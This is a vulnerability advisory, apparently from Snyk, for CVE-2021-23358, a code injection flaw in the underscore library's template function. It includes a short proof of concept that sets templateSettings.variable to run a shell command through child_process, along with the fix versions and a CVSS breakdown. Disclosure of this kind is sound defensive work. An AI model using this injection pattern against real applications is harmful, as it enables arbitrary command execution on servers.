Arbitrary Code Injection

Affecting underscore package, versions >=1.13.0-0 <1.13.0-2 || >=1.3.2 <1.12.1

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

underscore is a JavaScript's functional programming helper library.

Affected versions of this package are vulnerable to Arbitrary Code Injection via the template function, particularly when the variable option is taken from _.templateSettings as it is not sanitized.

PoC

const _ = require('underscore');
_.templateSettings.variable = "a = this.process.mainModule.require('child_process').execSync('touch HELLO')";
const t = _.template("")();

Remediation

Upgrade underscore to version 1.13.0-2, 1.12.1 or higher.

References

CVSS Score

3.3
low severity
  • Attack Vector
    Network
  • Attack Complexity
    High
  • Privileges Required
    High
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    Low
  • Integrity
    Low
  • Availability
    None
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N/E:P/RL:O/RC:C
Credit
Alessio Della Libera (@d3lla)
CVE
CVE-2021-23358
CWE
CWE-94
Snyk ID
SNYK-JS-UNDERSCORE-1080984
Disclosed
02 Mar, 2021
Published
29 Mar, 2021